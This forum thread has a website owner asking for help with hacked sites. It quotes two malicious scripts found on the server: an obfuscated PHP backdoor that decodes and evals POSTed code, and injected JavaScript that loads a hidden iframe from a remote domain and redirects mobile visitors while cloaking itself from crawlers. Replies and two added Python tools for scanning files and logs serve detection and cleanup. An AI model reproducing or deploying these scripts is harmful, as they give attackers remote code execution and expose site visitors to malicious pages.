Anyone got experience of malicious scripts?
Discussion
I have a couple of websites out there and a couple have been hacked and are sending out millions of email spam messages. I found two PHP files that seemed to be the 'engines' of the hack but have also found some dubious-looking code in some other files. Extract below. Seems very dodgy to me:
$version = "1.5";
// Only fires when the hidden POST parameter is present.
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
    // Probe whether eval() is available on this host.
    $isevalfunctionavailable = false;
    $evalcheck = "\$isevalfunctionavailable = true;";
    @eval($evalcheck);
    if ($isevalfunctionavailable === true) {
        // The concatenation spells out "base64_decode" so the literal name never appears in the file.
        $fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
        // Decode the POSTed payload and execute it as PHP.
        $fv = $fnsdht($_POST["gjwqweodsa"]);
        @eval($fv);
        //@eval($_POST["gjwqweodsa"]);
    }else{
        // Fallback when eval() is disabled: write the decoded payload to a temporary .php file,
        // include it (which runs it), then delete it. ($fnsdht is only set in the branch above,
        // so this path is broken as written.)
        $mpath = realpath("")."/";
        //$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
        if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
            @include_once($mpath."dsadasdsa1fag1.php");
            @unlink($mpath."dsadasdsa1fag1.php");
        }else{
            echo "ERROR! CANT DO NOTHING!";
        }
    }
}
Defo looks dodgy. Malware often uses base64-encoded URLs and malware code to avoid putting the actual URL of the remote malware hosting site/malware code in your source code.
I suggest you look for recently modified files for clues, and also download and search your source code files for base64_decode. Another tactic is to reverse dodgy commands and then use strrev to put the command in the right order when executing it.
There are a few free virus scanners out there, e.g. from AVG, that will access your website and report any references to malware sites. You can also buy a security service from Symantec which will see them scan your website every day and look for/report injected malware URLs.
ETA: you should do the standard things like updating any WordPress/Joomla back ends, any plugins etc., and change website passwords to try and close the holes. There may be plugins to block access to your site from countries that have lots of hackers and who are unlikely to legitimately access your sites (China and Russia being two common sources of attacks).
Edited by TurricanII on Wednesday 8th January 21:32
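TurricanII's advice above (search the source for base64_decode, watch for strrev tricks), turned into a small scanner as an added example that is not code from the thread: a Python script that walks a site's PHP files, statically folds runs of concatenated string literals (so the "b"."as"."e"... trick in the OP's extract becomes a visible base64_decode), and reports the indicators named here plus a few related ones. The indicator list, the two sample snippets, the regexes and the function names are my own choices, not the thread's.

```python
import re
import sys
from pathlib import Path

# Constructed sample: an imitation of the loader pattern from the thread, using the same
# string-concatenation trick to hide base64_decode. Not the OP's actual file.
SAMPLE_PHP = r'''<?php
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
$r = strrev("edoced_46esab");
'''

# Constructed benign snippet for comparison.
BENIGN_PHP = r'''<?php
echo htmlspecialchars($_GET["q"] ?? "");
'''

# A run of two or more double-quoted string literals joined by '.', e.g. "b"."as"."e"
CONCAT_RE = re.compile(r'"(?:[^"\\]|\\.)*"(?:\s*\.\s*"(?:[^"\\]|\\.)*")+')

# Function names that are rarely legitimate in page templates and common in shells (assumed list).
DANGEROUS = ("base64_decode", "eval", "gzinflate", "str_rot13", "strrev",
             "file_put_contents", "include_once", "assert", "create_function")

def fold_concats(src):
    """Statically join runs of concatenated string literals so hidden names become visible."""
    def join(m):
        parts = re.findall(r'"((?:[^"\\]|\\.)*)"', m.group(0))
        return '"' + "".join(parts) + '"'
    return CONCAT_RE.sub(join, src)

def scan_source(src):
    """Return a sorted list of indicator names found in (folded) PHP source."""
    folded = fold_concats(src)
    hits = set()
    for name in DANGEROUS:
        if re.search(r'\b' + re.escape(name) + r'\b', folded):
            hits.add(name)
    # eval() fed directly from a request superglobal
    if re.search(r'\beval\s*\(\s*\$(_POST|_GET|_REQUEST|_COOKIE)\b', folded):
        hits.add("eval_of_request_input")
    # a variable used as a function name, called on request input: $x($_POST[...])
    if re.search(r'\$[A-Za-z_]\w*\s*\(\s*\$_(POST|GET|REQUEST)', folded):
        hits.add("variable_function_on_request_input")
    # the name only appears after folding, i.e. it was deliberately split up
    if CONCAT_RE.search(src) and "base64_decode" in folded and "base64_decode" not in src:
        hits.add("hidden_function_name_via_concat")
    # strrev applied to a literal: the reversed-command tactic mentioned in the thread
    if re.search(r'strrev\s*\(\s*"[^"]*"\s*\)', src):
        hits.add("reversed_string_literal")
    return sorted(hits)

def scan_tree(root):
    """Scan every .php file under root; return {path: indicators} for files with hits."""
    report = {}
    for p in Path(root).rglob("*.php"):
        try:
            hits = scan_source(p.read_text(errors="replace"))
        except OSError:
            continue
        if hits:
            report[str(p)] = hits
    return report

if __name__ == "__main__":
    print(scan_source(SAMPLE_PHP))
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, ",".join(hits))
```

Run it against a downloaded copy of the site (python scanner.py /path/to/site). It does not strip comments, so a commented-out @eval($_POST[...]) line like the one in the extract will still be flagged, which is what you want while hunting; expect some noise from legitimate plugins that use base64_decode for data rather than code.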
I don't have the full logs as it's third-party hosted, but I've also found this in index.php:
echo "<script type=\"text/javascript\">
// Creates a 10x10 iframe pushed off-screen (unless one with this id already exists)
// and points it at the URL passed in.
function sd5135GHEDF(agaga31323l) {
    var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
    if (typeof(melm) != \"undefined\" && melm!= null)
    {}else{
        var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
        dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
        dsdSSSWrw515312FFF.style.width = \"10px\";
        dsdSSSWrw515312FFF.style.height = \"10px\";
        dsdSSSWrw515312FFF.style.border = \"0px\";
        dsdSSSWrw515312FFF.frameBorder = \"0\";
        dsdSSSWrw515312FFF.style.position = \"absolute\";
        dsdSSSWrw515312FFF.style.left = \"-200\";
        dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
        document.body.appendChild(dsdSSSWrw515312FFF);
        dsdSSSWrw515312FFF.src = agaga31323l;
        return true;
    }
}
// Desktop visitors get the hidden iframe loaded from the remote site.
function asd61234tkhjasd454hfhf235(){
    sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
}
// Cloaking: search-engine crawlers are skipped so the injection stays out of their scans;
// mobile user agents are redirected outright after one second.
function SFWR64362fdhHHHHH(){
    if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
    if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){
        try{setTimeout(function(){window.location=\"http://novostivkontakte.ru/?id=mob\";},1000);}
        catch(err) {window.location=\"http://novostivkontakte.ru/?id=mob\";location.href=\"http://novostivkontakte.ru/?id=mob\";}
    }
}
//setTimeout(function(){R();},1500);
// Hooks the page's onload without clobbering any handler the page already set.
try {
    if(window.attachEvent) {
        window.attachEvent(\"onload\", SFWR64362fdhHHHHH);
    } else {
        if(window.onload) {
            var curronload = window.onload;
            var newonload = function() {
                curronload();
                SFWR64362fdhHHHHH();
            };
            window.onload = newonload;
        } else {
            window.onload = SFWR64362fdhHHHHH;
        }
    }
} catch(err) {}
</script>";
Can you get any history on addresses accessing the pages containing the code? It's been... 10 years since I wrote any PHP, but it looks like it'd let someone take over and run whatever they want within PHP on that website by passing a PHP file as POST data and either running it with eval or passing it out as a file. But it could be being accessed by a separate script on another website, hence the question, as it might lead back to a URL, domain owner etc.
Probably something in China but hey.....
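The question above about access history, as an added example that is not code from the thread: a Python script that parses combined-format access-log lines, pulls out POST requests to paths that are not known form handlers (the extract is driven entirely by a POST parameter), and groups them by client IP so the traffic can be traced back to its source. The log lines, IP addresses and path names are constructed for the example; the allowed-path set and the function names are my own assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed access-log lines in Apache/nginx "combined" format. IPs are from the
# documentation ranges (203.0.113.0/24, 198.51.100.0/24); paths and hosts are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jan/2014:21:14:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/26.0"
198.51.100.23 - - [08/Jan/2014:21:15:41 +0000] "POST /images/cache.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
198.51.100.23 - - [08/Jan/2014:21:15:43 +0000] "POST /images/cache.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
203.0.113.7 - - [08/Jan/2014:21:16:10 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://example.test/post/" "Mozilla/5.0 (Windows NT 6.1) Firefox/26.0"
198.51.100.23 - - [08/Jan/2014:21:17:03 +0000] "POST /images/cache.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
198.51.100.99 - - [08/Jan/2014:21:18:30 +0000] "GET /images/cache.php HTTP/1.1" 200 0 "-" "python-requests/2.0"
"""

# One combined-format line: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def parse_log(text):
    """Parse combined-format lines into dicts; malformed lines are skipped, not raised."""
    out = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            out.append(m.groupdict())
    return out

def suspicious_posts(entries, allowed_post_paths):
    """POST requests to paths that are not known form handlers: candidates for shell traffic."""
    return [e for e in entries
            if e["method"] == "POST" and e["path"] not in allowed_post_paths]

def summarize_by_ip(entries):
    """Group hits per client IP: (ip, count, sorted paths), most active first."""
    counts = Counter(e["ip"] for e in entries)
    paths = defaultdict(set)
    for e in entries:
        paths[e["ip"]].add(e["path"])
    return [(ip, n, sorted(paths[ip])) for ip, n in counts.most_common()]

def accessed_paths(entries, suspicious):
    """Every request, any method, to a path seen in suspicious POSTs: who else touched it."""
    targets = {e["path"] for e in suspicious}
    return [e for e in entries if e["path"] in targets]

if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    sus = suspicious_posts(entries, {"/wp-comments-post.php"})
    for ip, n, paths in summarize_by_ip(sus):
        print(ip, n, paths)
    for e in accessed_paths(entries, sus):
        print(e["time"], e["ip"], e["method"], e["path"], e["ua"])
```

Feed it the real log with parse_log(open("access.log").read()) and put the site's genuine POST endpoints (login, comment and contact forms) in the allowed set; what remains is the short list of addresses and user agents worth asking the host about. The second loop matters because a shell's operator often fetches the file with GET first to check it is still there.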